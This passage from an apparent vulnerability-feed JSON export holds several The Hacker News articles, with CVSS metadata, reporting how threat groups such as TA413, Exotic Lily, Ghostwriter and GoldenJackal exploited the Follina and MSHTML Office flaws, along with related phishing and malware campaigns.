weaponizing the new [zero-day flaw](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) in Microsoft Office to achieve code execution on affected systems.\n\n\"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique,\" enterprise security firm Proofpoint [said](<https://twitter.com/threatinsight/status/1531688214993555457>) in a tweet.\n\n\"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app.\"\n\n[TA413](<https://malpedia.caad.fkie.fraunhofer.de/actor/ta413>) is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as [Exile RAT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat>) and [Sepulcher](<https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher>) as well as a rogue Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the \"ms-msdt:\" protocol URI scheme to execute arbitrary code.\n\nSpecifically, the attack makes it possible for threat actors to circumvent [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the [Preview Pane](<https://docs.microsoft.com/en-us/windows/powertoys/file-explorer>) in Windows File Explorer.\n\nWhile the bug gained widespread attention last week, evidence points to active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to 
Microsoft.\n\nThe company, however, [did not deem it a security issue](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) and closed the vulnerability submission report, citing reasons that the MSDT utility requires a [passkey](<https://social.technet.microsoft.com/wiki/contents/articles/30458.windows-10-ctp-how-to-run-microsoft-support-diagnostic-tool.aspx#How_shall_I_get_the_Passkey>) provided by a support technician before it can execute payloads.\n\nThe vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 21 and Office Professional Plus editions.\n\n\"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros,\" Malwarebytes' Jerome Segura [noted](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/05/microsoft-office-zero-day-follina-its-not-a-bug-its-a-feature-its-a-bug/>).\n\nAlthough there is no official patch available at this point, Microsoft has [recommended](<https://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html>) disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been [advised](<https://twitter.com/wdormann/status/1531259406624620544>) to turn off the Preview Pane in File Explorer.\n\n\"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely,\" Nikolas Cemerikic of Immersive Labs said.\n\n\"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. 
Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-06-01T06:02:00", "type": "thn", "title": "Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-01T10:00:06", "id": "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "href": "https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-21T15:55:37", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhTDhGSCLFNoe2MDkuwd-dbu3bKqPHtCuuSNeeosLJmQdiXnE3Hq_M2wsCJ9OqEk2ig0Jn0ITJ4RW9LkqUzEeWCBF6R1H6SS_wGXq_pLI3Y38VenthyRa2AlQQkCDlvzat6a-UDOxxvG3p-0r9ppLP1GKrMXdqPUW28Q6TZDz8v57TTuwc6KS6gi8pJ>)\n\nGoogle's Threat Analysis Group (TAG) took the wraps off a new [initial access broker](<https://thehackernews.com/2021/11/blackberry-uncover-initial-access.html>) that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations.\n\nDubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform ([CVE-2021-40444](<https://thehackernews.com/2021/09/microsoft-releases-patch-for-actively.html>)) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.\n\n\"Initial access brokers are the opportunistic locksmiths of the security world, and it's a full-time job,\" TAG researchers Vlad Stolyarov and Benoit Sevens 
[said](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>). \"These groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\"\n\nExotic Lily, first spotted in September 2021, is said to have been involved in data exfiltration and deployment of the human-operated Conti and [Diavol](<https://thehackernews.com/2021/08/researchers-find-new-evidence-linking.html>) ransomware strains, both of which share overlaps with Wizard Spider, the Russian cyber criminal syndicate that's also known for operating [TrickBot](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>), [BazarBackdoor](<https://thehackernews.com/2021/07/phony-call-centers-tricking-users-into.html>), and [Anchor](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>).\n\n\"Yes, this is a possibility, especially considering this is more sophisticated and targeted than a traditional spam campaign, but we don't know for sure as of now,\" Google TAG told The Hacker News when asked whether Exotic Lily could be another extension of the Wizard Spider group.\n\n\"In the [Conti leaks](<https://thehackernews.com/2022/03/conti-ransomware-gangs-internal-chats.html>), Conti members mention 'spammers' as someone who they work with (e.g., provide custom-built 'crypted' malware samples, etc.) through outsourcing. 
However, most of the 'spammers' don't seem to be present (or actively communicate) in the chat, hence leading to a conclusion they're operating as a separate entity.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEiRLlObJVyztso8c0_EbePqlTPrjHuRu1-NWCjxiV47unTWyXRykIMkEo4lnhKEbWUZSP4zUPmn3jo-N6O4gz5CgskYHypFzEWSI4djVkBE6Gle_kwlb7Mp7tQN5cmk2BPWhrXILnSvxl38u2qgqfAntvF85WiXMyt0WIn_ikXRHLwk6apNoOd64qob>)\n\nThe threat actor's social engineering lures, sent from spoofed email accounts, have specifically singled out IT, cybersecurity, and healthcare sectors, although post November 2021, the attacks have grown to be more indiscriminate, targeting a wide variety of organizations and industries.\n\nBesides using fictitious companies and identities as a means to build trust with the targeted entities, Exotic Lily has leveraged legitimate file-sharing services like WeTransfer, TransferNow and OneDrive to deliver [BazarBackdoor payloads](<https://abnormalsecurity.com/blog/bazarloader-contact-form>) in a bid to evade detection mechanisms.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjD7gTpku0C6R-pc9VwoTyiLgYiON0B6dyOqyFgyXxeXOTvF5CYHGGGVF3SC9He4ccMof89UgDp1tK7Xuin_iXJUH3yaRAFHQbBlmFKaz-VMRRWlsJZkQMC2Nsov-UnJQdUe37HX901rV208dbe-xqakcZ50w5XWf02Ldv4BMHbCtI-It_dm8dsiLFc>)\n\nThe rogue personas often posed as employees of firms such as Amazon, complete with fraudulent social media profiles on LinkedIn that featured fake AI-generated profile pictures. 
The group is also said to have impersonated real company employees by lifting their personal data from social media and business databases like RocketReach and CrunchBase.\n\n\"At the final stage, the attacker would upload the payload to a public file-sharing service (TransferNow, TransferXL, WeTransfer or OneDrive) and then use a built-in email notification feature to share the file with the target, allowing the final email to originate from the email address of a legitimate file-sharing service and not the attacker's email, which presents additional detection challenges,\" the researchers said.\n\nAlso delivered using the MHTML exploit is a custom loader called Bumblebee that's orchestrated to gather and exfiltrate system information to a remote server, which responds back commands to execute shellcode and run next-stage executables, including Cobalt Strike.\n\nAn analysis of the Exotic Lily's communication activity indicates that the threat actors have a \"typical 9-to-5 job\" on weekdays and may be possibly working from a Central or an Eastern Europe time zone.\n\n\"Exotic Lily seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors,\" the researchers concluded.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T07:31:00", "type": "thn", "title": "Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-21T13:32:08", "id": "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "href": "https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-05T03:38:09", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjI291J10LW67nc2C0UITCwpnhtduhMMY8ndL7-O83eu0zDh2WUIKe9oQiLkdnGI3y197Sqw_347ZW1fDrAE20TW48AvjuRlbQs4jajAbPaCjJbtzYHF8r5WHSfDMS_3mNTO-vTSDdTv2WKNT9BNnzfC2vPEosQs6BTjTvxD329uaye72syjHXguduS/s728-e100/flag.jpg>)\n\nA Belarusian threat actor known as Ghostwriter (aka UNC1151) has been spotted leveraging 
the recently disclosed browser-in-the-browser (BitB) technique as part of their credential phishing campaigns exploiting the ongoing Russo-Ukrainian conflict.\n\nThe method, which [masquerades](<https://thehackernews.com/2022/03/new-browser-in-browser-bitb-attack.html>) as a legitimate domain by simulating a browser window within the browser, makes it possible to mount convincing social engineering campaigns.\n\n\"Ghostwriter actors have quickly adopted this new technique, combining it with a previously observed technique, hosting credential phishing landing pages on compromised sites,\" Google's Threat Analysis Group (TAG) [said](<https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/>) in a new report, using it to siphon credentials entered by unsuspected victims to a remote server.\n\nAmong other groups [using the war as a lure](<https://thehackernews.com/2022/03/google-russian-hackers-target.html>) in phishing and malware campaigns to deceive targets into opening fraudulent emails or links include [Mustang Panda](<https://thehackernews.com/2022/03/chinese-mustang-panda-hackers-spotted.html>) and [Scarab](<https://thehackernews.com/2022/03/another-chinese-hacking-group-spotted.html>) as well as nation-state actors from Iran, North Korea, and Russia.\n\nAlso included in the list is Curious Gorge, a hacking crew that TAG has attributed to China's People's Liberation Army Strategic Support Force (PLASSF), which has orchestrated attacks against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.\n\nA third set of attacks observed over the past two-week period originated from a Russia-based hacking group known as COLDRIVER (aka Callisto). 
TAG said that the actor staged credential phishing campaigns targeting multiple U.S.-based NGOs and think tanks, the military of a Balkans country, and an unnamed Ukrainian defense contractor.\n\n\"However, for the first time, TAG has observed COLDRIVER campaigns targeting the military of multiple Eastern European countries, as well as a NATO Centre of Excellence,\" TAG researcher Billy Leonard said. \"These campaigns were sent using newly created Gmail accounts to non-Google accounts, so the success rate of these campaigns is unknown.\"\n\n### Viasat breaks down February 24 Attack\n\nThe disclosure comes as U.S.-based telecommunications firm Viasat spilled details of a \"multifaceted and deliberate\" cyber attack against its KA-SAT network on February 24, 2022, coinciding with Russia's military invasion of Ukraine.\n\nThe attack on the satellite broadband service disconnected tens of thousands of modems from the network, impacting several customers in Ukraine and across Europe and affecting the [operations of 5,800 wind turbines](<https://www.reuters.com/business/energy/satellite-outage-knocks-out-control-enercon-wind-turbines-2022-02-28/>) belonging to the German company Enercon in Central Europe.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjBPeFDF2b99SCr6BVB_zZ-LCkJ_Z4VIMJJ2_hv0dUXzJcbyh_0y2xuG6Ih-wOEDAAPScYYXNZFPIRH4HldJI-VuJV3m-fvIGibDE8t_PLlac8yuJ61A4gBdKQp6TWVpKqVMIRJm7Yxt_9F3F0hbUWlh8rMT48xechHXRrjEbMDZ2TLWlcobJPrpxEq/s728-e100/phishing.jpg>)\n\n\"We believe the purpose of the attack was to interrupt service,\" the company [explained](<https://www.viasat.com/about/newsroom/blog/ka-sat-network-cyber-attack-overview/>). \"There is no evidence that any end-user data was accessed or compromised, nor customer personal equipment (PCs, mobile devices, etc.) 
was improperly accessed, nor is there any evidence that the KA-SAT satellite itself or its supporting satellite ground infrastructure itself were directly involved, impaired or compromised.\"\n\nViasat linked the attack to a \"ground-based network intrusion\" that exploited a misconfiguration in a VPN appliance to gain remote access to the KA-SAT network and execute destructive commands on the modems that \"overwrote key data in flash memory,\" rendering them temporarily unable to access the network.\n\n### Russian dissidents targeted with Cobalt Strike\n\nThe relentless attacks are the latest in a long list of malicious cyber activities that have emerged in the wake of the continuing conflict in Eastern Europe, with government and commercial networks suffering from a string of disruptive [data wiper infections](<https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html>) in conjunction with a series of ongoing distributed denial-of-service (DDoS) attacks.\n\nThis has also taken the form of compromising legitimate WordPress sites to inject rogue JavaScript code with the goal of carrying out DDoS attacks against Ukrainian domains, according to [researchers](<https://twitter.com/malwrhunterteam/status/1508517334239043584>) from the MalwareHunterTeam.\n\nBut it's not just Ukraine. Malwarebytes Labs this week laid out specifics of a new spear-phishing campaign targeting Russian citizens and government entities in an attempt to deploy pernicious payloads on compromised systems.\n\n\"The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid,\" Hossein Jazi [said](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>). 
\"Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.\"\n\nThe malware-laced RTF documents contain an exploit for the widely abused MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://thehackernews.com/2022/01/hackers-exploited-mshtml-flaw-to-spy-on.html>)), leading to the execution of a JavaScript code that spawns a PowerShell command to download and execute a Cobalt Strike beacon retrieved from a remote server.\n\nAnother cluster of activity potentially relates to a Russian threat actor tracked as Carbon Spider (aka [FIN7](<https://thehackernews.com/2021/10/hackers-set-up-fake-company-to-get-it.html>)), which has employed a similar maldocs-oriented attack vector that's engineered to drop a PowerShell-based backdoor capable of fetching and running a next-stage executable.\n\nMalwarebytes also said it has detected a \"significant uptick in malware families being used with the intent of stealing information or otherwise gaining access in Ukraine,\" including [Hacktool.LOIC](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool%3AWin32%2FOylecann.A>), [Ainslot Worm](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Ainslot.A!reg>), FFDroider, [Formbook](<https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook>), [Remcos](<https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos>), and [Quasar RAT](<https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/>).\n\n\"While these families are all relatively common in the cybersecurity world, the fact that we witnessed spikes almost exactly when Russian troops crossed the Ukrainian border makes these developments interesting and unusual,\" Adam Kujawa, director of Malwarebytes Labs, said in a statement shared with The Hacker News.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-31T13:02:00", "type": "thn", "title": "Hackers Increasingly Using 'Browser-in-the-Browser' Technique in Ukraine Related Attacks", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-05T02:23:33", "id": "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "href": "https://thehackernews.com/2022/03/hackers-increasingly-using-browser-in.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:20", "description": "[](<https://thehackernews.com/images/-KnvkhCvOrtg/YTgvMst2aSI/AAAAAAAADvs/ibzrIC7hu6wR3f2vrtI3U2rW7SVg6UbKQCLcBGAsYHQ/s0/microsoft-office-hack.jpg>)\n\nMicrosoft on Tuesday warned of an actively exploited zero-day flaw impacting Internet Explorer that's being used to hijack vulnerable Windows systems by leveraging weaponized Office 
documents.\n\nTracked as CVE-2021-40444 (CVSS score: 8.8), the remote code execution flaw is rooted in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.\n\n\"Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents,\" the company [said](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>).\n\n\"An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\" it added.\n\nThe Windows maker credited researchers from EXPMON and Mandiant for reporting the flaw, although the company did not disclose additional specifics about the nature of the attacks, the identity of the adversaries exploiting this zero-day, or their targets in light of real-world attacks.\n\nEXPMON, in a [tweet](<https://twitter.com/EXPMON_/status/1435309115883020296>), noted it found the vulnerability after detecting a \"highly sophisticated zero-day attack\" aimed at Microsoft Office users, adding it passed on its findings to Microsoft on Sunday. 
\"The exploit uses logical flaws so the exploitation is perfectly reliable (& dangerous),\" EXPMON researchers said.\n\nHowever, it's worth pointing out that the current attack can be suppressed if Microsoft Office is run with default configurations, wherein documents downloaded from the web are opened in [Protected View](<https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>) or [Application Guard for Office](<https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide>), which is designed to prevent untrusted files from accessing trusted resources in the compromised system.\n\nMicrosoft, upon completion of the investigation, is expected to either release a security update as part of its Patch Tuesday monthly release cycle or issue an out-of-band patch \"depending on customer needs.\" In the interim, the Windows maker is urging users and organizations to disable all ActiveX controls in Internet Explorer to mitigate any potential attack.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-08T03:37:00", "type": "thn", "title": "New 0-Day Attack Targeting Windows Users With Microsoft Office Documents", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T04:55:07", "id": "THN:D4E86BD8938D3B2E15104CA4922A51F8", "href": "https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-24T10:20:50", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjKx6lnebkMoVxrD6i2a9kHJMAK5StxF6UxajtGC-QKg5H7keNnKCBTpf-Bd8WwGeUEEfMG2Ggx08MrkhJWyUl22L9HcF5u4bQjfUVvL0VUOr0pFg3D_XL31sY-zLG7VDiFGPVTewvqYAqdOJK9m6gUKqO6V3YHg5ylRQkhbSZxgEioqOxwvUsuvejm/s728-e365/hackers.jpg>)\n\nGovernment and diplomatic entities in the Middle East and South Asia are the target of a 
new advanced persistent threat actor named **GoldenJackal**.\n\nRussian cybersecurity firm Kaspersky, which has been [keeping tabs](<https://securelist.com/goldenjackal-apt-group/109677/>) on the group's activities since mid-2020, characterized the adversary as both capable and stealthy.\n\nThe targeting scope of the campaign is focused on Afghanistan, Azerbaijan, Iran, Iraq, Pakistan, and Turkey, infecting victims with tailored malware that steals data, propagates across systems via removable drives, and conducts surveillance.\n\nGoldenJackal is suspected to have been active for at least four years, although little is known about the group. Kaspersky said it has been unable to determine its origin or affiliation with known threat actors, but the actor's modus operandi suggests an espionage motivation.\n\nWhat's more, the threat actor's attempts to maintain a low profile and disappear into the shadows bears all the hallmarks of a state-sponsored group.\n\nThat said, some tactical overlaps have been observed between the threat actor and [Turla](<https://thehackernews.com/2023/05/us-government-neutralizes-russias-most.html>), one of Russia's [elite nation-state hacking crews](<https://www.wired.com/story/turla-history-russia-fsb-hackers/>). 
In one instance, a victim machine was infected by Turla and GoldenJackal two months apart.\n\nThe exact initial path employed to breach targeted computers is unknown at this stage, but evidence gathered so far points to the use of trojanized Skype installers and malicious Microsoft Word documents.\n\nWhile the installer serves as a conduit to deliver a .NET-based trojan called JackalControl, the Word files have been observed weaponizing the [Follina vulnerability](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)) to drop the same malware.\n\nJackalControl, as the name indicates, enables the attackers to remotely commandeer the machine, execute arbitrary commands, as well as upload and download from and to the system.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhX4xXiopFD7kY0eMtwKUzmwJ9yEJOldW4unujyer5BqYZeccOBwGgencFn_P38MZTiYFquMCRF-Tq9hIhEX_z6Bx9TsPJeRsdYa-u1HfL4Zg61fkA2fhI9LUcVFR15RcFLUjeJ8LaLYUwCemRwCs3NNZd2s0vIxG8CfsS2UKdhaI06y7bRDpciT7mE/s728-e365/map.jpg>) \n--- \nGeography of victims \n \nSome of the other malware families deployed by GoldenJackal are as follows -\n\n * **JackalSteal** \\- An implant that's used to find files of interest, including those located in removable USB drives, and transmit them to a remote server.\n * **JackalWorm** \\- A worm that's engineered to infect systems using removable USB drives and install the JackalControl trojan.\n * **JackalPerInfo** \\- A malware that comes with features to harvest system metadata, folder contents, installed applications, and running processes, and credentials stored in web browser databases.\n * **JackalScreenWatcher** \\- A utility to grab screenshots based on a preset time interval and send them to an actor-controlled server.\n\nAnother notable aspect of the threat actor is its reliance on hacked WordPress sites as a relay to forward web requests to the 
actual command-and-control (C2) server by means of a rogue PHP file injected into the websites.\n\n\"The group is probably trying to reduce its visibility by limiting the number of victims,\" Kaspersky researcher Giampaolo Dedola said. \"Their toolkit seems to be under development \u2013 the number of variants shows that they are still investing in it.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-05-23T15:30:00", "type": "thn", "title": "GoldenJackal: New Threat Group Targeting Middle Eastern and South Asian Governments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-05-24T06:25:07", "id": "THN:1B983787EB2BA5D0757F1F83458B7ABE", "href": "https://thehackernews.com/2023/05/goldenjackal-new-threat-group-targeting.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:01", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgNo0JIZZ2xVs6xWtBDjG87OxZhnIm24TPPfBsB4b1eUH3h75A9m5-rMQtbJNUn997mhuZ9FVOeso_N8_mbXm7xPWkdN_VN9xEC-jz_XOOnSKdgBn0U32ePvsu7MkJ99eVXjBZrFnXBotJEoO7vu7eUykxbIFN-6PnFuHXb16ZuNxWHY26VBO19rhGB/s728-e100/russian-hackers.jpg>)\n\nFormer members of the Conti cybercrime cartel have been implicated in five different campaigns targeting Ukraine from April to August 2022.\n\nThe findings, which come from Google's Threat Analysis Group (TAG), builds upon a [prior report](<https://thehackernews.com/2022/07/russian-hackers-tricked-ukrainians-with.html>) published in July 2022 detailing the [continued cyber activity](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/>) aimed at the Eastern European nation amid the ongoing Russo-Ukrainian war.\n\n\"UAC-0098 is a threat actor that historically delivered the [IcedID banking trojan](<https://thehackernews.com/2022/03/hackers-hijack-email-reply-chains-on.html>), leading to human-operated ransomware attacks,\" TAG researcher Pierre-Marc Bureau [said](<https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/>) in a report shared with The Hacker News.\n\n\"The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations.\"\n\nUAC-0098 is believed to have functioned as an initial access broker for ransomware groups such as Quantum and [Conti](<https://thehackernews.com/2022/04/gold-ulrick-hackers-still-in-action.html>) (aka FIN12, Gold Ulrick, or Wizard Spider), the former of which was [subsumed by the latter](<https://thehackernews.com/2022/08/conti-cybercrime-cartel-using-bazarcall.html>) in April 
